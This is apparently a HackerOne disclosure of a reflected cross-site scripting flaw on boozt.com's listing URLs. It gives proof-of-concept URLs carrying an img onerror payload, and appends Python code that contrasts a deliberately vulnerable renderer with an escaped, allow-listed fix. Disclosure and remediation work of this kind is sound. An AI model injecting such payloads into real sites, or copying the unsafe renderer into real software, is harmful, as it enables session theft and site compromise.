Boozt Fashion AB: Reflected XSS on www.boozt.com

2015-11-14T02:05:42
ID H1:99594
Type hackerone
Reporter stefanofinding
Modified 2017-08-01T10:46:13

Description

The listing endpoints, like http://www.boozt.com/eu/en/esprit-collection/blouses-woven_11239380, reflect the requested URL in the server response without escaping, and they accept any value between /esprit-collection/ and _11239380. The problem is that you can send a request like http://www.boozt.com/eu/en/esprit-collection/%22%3E%3Cimg%20src%3dx%20onerror%3dalert%28document.domain%29%3E_11239380 and it will be treated as valid.

Proof of concept

  1. Go to http://www.boozt.com/eu/en/esprit-collection/%22%3E%3Cimg%20src%3dx%20onerror%3dalert%28document.domain%29%3E_11239380
  2. alert(document.domain) is executed a few times.
  3. Go to http://www.boozt.com/eu/en/scotch-and-soda/%22%3E%3Cimg%20src%3dx%20onerror%3dalert%28document.domain%29%3E_11312517
  4. alert(document.domain) is executed a few times.

It is reproducible on Firefox. Please let me know if you need more information.
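The root cause described in the report is a listing route that echoes the decoded path into HTML while accepting an arbitrary slug between the collection and the `_<id>` suffix. The following is an added illustration (not code from the report or from Boozt) of the reported pattern beside a hardened version; it assumes the reflection point is a canonical `<link>` tag and that slugs are meant to be lowercase hyphenated words, neither of which the report states.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample paths: the first is the legitimate listing URL from the
# report, the second is the report's proof-of-concept path (still URL-encoded).
GOOD_PATH = "/eu/en/esprit-collection/blouses-woven_11239380"
POC_PATH = ("/eu/en/esprit-collection/"
            "%22%3E%3Cimg%20src%3dx%20onerror%3dalert%28document.domain%29%3E_11239380")

# Listing URL shape taken from the report: /eu/en/<collection>/<slug>_<numeric id>
LISTING_RE = re.compile(r"^/eu/en/(?P<collection>[^/]+)/(?P<slug>.+)_(?P<id>\d+)$")
# Assumed allow-list for slugs; the report does not state the real format.
SLUG_RE = re.compile(r"^[a-z0-9]+(?:-[a-z0-9]+)*$")
NOT_FOUND = "<h1>404 Not Found</h1>"


def parse_listing_path(path):
    """Decode the request path and split it into (collection, slug, id), or None."""
    m = LISTING_RE.match(unquote(path))
    if not m:
        return None
    return m.group("collection"), m.group("slug"), m.group("id")


def render_unsafe(path):
    """Mirrors the reported behaviour: the decoded URL lands in HTML verbatim,
    so a slug containing '">' closes the attribute and injects markup."""
    return f'<link rel="canonical" href="http://www.boozt.com{unquote(path)}">'


def render_hardened(path):
    """Two independent fixes: reject slugs outside the allow-list (the id alone
    should not make a URL 'valid'), and HTML-escape whatever is echoed."""
    parts = parse_listing_path(path)
    if parts is None:
        return NOT_FOUND
    collection, slug, listing_id = parts
    if not SLUG_RE.match(slug) or not SLUG_RE.match(collection):
        return NOT_FOUND  # reject instead of trying to sanitise the payload
    canonical = f"http://www.boozt.com/eu/en/{collection}/{slug}_{listing_id}"
    return f'<link rel="canonical" href="{html.escape(canonical, quote=True)}">'
```

Running `render_hardened(POC_PATH)` yields a 404 while `render_unsafe(POC_PATH)` emits the injected `<img>` tag, which is the observable difference a regression test for this class of bug should check.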